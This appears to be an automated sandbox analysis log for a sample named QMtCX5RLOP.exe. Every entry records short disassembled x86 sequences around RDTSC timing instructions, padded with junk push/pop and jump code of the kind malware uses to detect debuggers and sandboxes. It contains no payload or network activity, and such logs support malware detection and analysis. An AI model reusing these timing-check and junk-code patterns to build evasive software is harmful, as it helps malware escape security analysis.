Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626381 second address: 162639E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9D00F1DB68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16264E6 second address: 16264EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16264EA second address: 1626500 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D00F1DB5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626500 second address: 1626504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626504 second address: 1626513 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D00F1DB56h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1626513 second address: 1626519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162EAEF second address: 162EAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162EAF3 second address: 162EB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D01181AB3h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162EB1D second address: 162EB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162EB21 second address: 162EB25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162EDDC second address: 162EDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162EDE4 second address: 162EDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162F9F4 second address: 162FA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9D00F1DB56h 0x0000000a jg 00007F9D00F1DB56h 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 jno 00007F9D00F1DB56h 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 162FA0F second address: 162FA19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9D01181AA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1638DBE second address: 1638DDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9D00F1DB66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1638DDA second address: 1638DDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1639209 second address: 163923B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F9D00F1DB68h 0x0000000b popad 0x0000000c jno 00007F9D00F1DB58h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F9D00F1DB56h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 163923B second address: 163923F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 163923F second address: 1639247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1639247 second address: 1639253 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D01181AAEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1639253 second address: 163925D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 163925D second address: 1639261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 164160E second address: 1641621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jp 00007F9D00F1DB7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1641621 second address: 1641625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1641794 second address: 164179E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9D00F1DB56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1642003 second address: 1642008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1642008 second address: 164200E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 164200E second address: 1642014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16426EA second address: 16426F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9D00F1DB5Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16426F8 second address: 16426FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16426FC second address: 1642705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1640DA9 second address: 1640DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1640DAE second address: 1640DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 164A077 second address: 164A07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16502E3 second address: 16502E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16502E7 second address: 165032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007F9D01181AA6h 0x0000000d jmp 00007F9D01181AB8h 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F9D01181AA6h 0x0000001b jmp 00007F9D01181AB6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165032B second address: 165032F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165032F second address: 1650364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jc 00007F9D01181AE3h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9D01181AB1h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1652AF5 second address: 1652B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F9D00F1DB66h 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F9D00F1DB56h 0x00000012 jp 00007F9D00F1DB56h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1652955 second address: 1652965 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1652965 second address: 165296A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165296A second address: 1652970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165B587 second address: 165B5B2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9D00F1DB6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165B5B2 second address: 165B5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165B5B6 second address: 165B5C0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9D00F1DB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165B5C0 second address: 165B5CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D01181AA8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165B5CE second address: 165B5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165B144 second address: 165B168 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9D01181AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D01181AB8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165ECDD second address: 165ED0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9D00F1DB62h 0x0000000d ja 00007F9D00F1DB66h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165ED0D second address: 165ED18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9D01181AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 165ED18 second address: 165ED1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1663BE6 second address: 1663BF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F9D01181AB2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1663BF8 second address: 1663BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1663BFE second address: 1663C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1667AB2 second address: 1667AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 166C6E9 second address: 166C6F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 166F1C1 second address: 166F1C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16776C7 second address: 16776CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1675FBD second address: 1675FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1675FC1 second address: 1675FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 167635A second address: 1676360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16764ED second address: 16764F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16764F1 second address: 16764F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16764F7 second address: 1676513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D01181AB2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1676513 second address: 167652F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 167652F second address: 1676533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1676672 second address: 167667F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F9D00F1DB56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1676800 second address: 1676830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D01181AB3h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9D01181AB4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1676830 second address: 1676834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1678EB4 second address: 1678ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F9D01181AAFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 167BDBC second address: 167BDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F9D00F1DB62h 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16BFA63 second address: 16BFA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16BFA69 second address: 16BFA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 16BFA6D second address: 16BFA77 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D01181AA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AF7B second address: 179AF8D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F9D00F1DB56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AF8D second address: 179AF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AF93 second address: 179AF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179A60B second address: 179A612 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179A783 second address: 179A78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AA5B second address: 179AA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9D01181AA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AA69 second address: 179AA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9D00F1DB64h 0x0000000b popad 0x0000000c ja 00007F9D00F1DB62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AA8C second address: 179AA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179ABED second address: 179ABF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179ABF2 second address: 179ABF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179ABF7 second address: 179AC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007F9D00F1DB56h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9D00F1DB60h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a jmp 00007F9D00F1DB63h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AC2F second address: 179AC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AC35 second address: 179AC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179AC3B second address: 179AC56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D01181AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179C7BA second address: 179C7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179C7C0 second address: 179C7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179C7C4 second address: 179C7E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D00F1DB56h 0x00000008 jng 00007F9D00F1DB56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F9D00F1DB5Ch 0x00000016 jnp 00007F9D00F1DB56h 0x0000001c popad 0x0000001d push edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179F0AC second address: 179F0B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 179F5BF second address: 179F681 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D00F1DB67h 0x00000008 jmp 00007F9D00F1DB61h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 pushad 0x00000011 jg 00007F9D00F1DB5Bh 0x00000017 and ax, 24F1h 0x0000001c add dword ptr [ebp+122D19DEh], edi 0x00000022 popad 0x00000023 mov dword ptr [ebp+122D2588h], ecx 0x00000029 push dword ptr [ebp+122D362Ch] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F9D00F1DB58h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 call 00007F9D00F1DB67h 0x0000004e pop edx 0x0000004f call 00007F9D00F1DB59h 0x00000054 jbe 00007F9D00F1DB60h 0x0000005a pushad 0x0000005b push ebx 0x0000005c pop ebx 0x0000005d jc 00007F9D00F1DB56h 0x00000063 popad 0x00000064 push eax 0x00000065 push ecx 0x00000066 push esi 0x00000067 jmp 00007F9D00F1DB5Ch 0x0000006c pop esi 0x0000006d pop ecx 0x0000006e mov eax, dword ptr [esp+04h] 0x00000072 js 00007F9D00F1DB63h 0x00000078 jmp 00007F9D00F1DB5Dh 0x0000007d mov eax, dword ptr [eax] 0x0000007f je 00007F9D00F1DB60h 0x00000085 push eax 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 17A1028 second address: 17A1047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9D01181AA6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F9D01181AAFh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 17A2C48 second address: 17A2C52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9D00F1DB62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
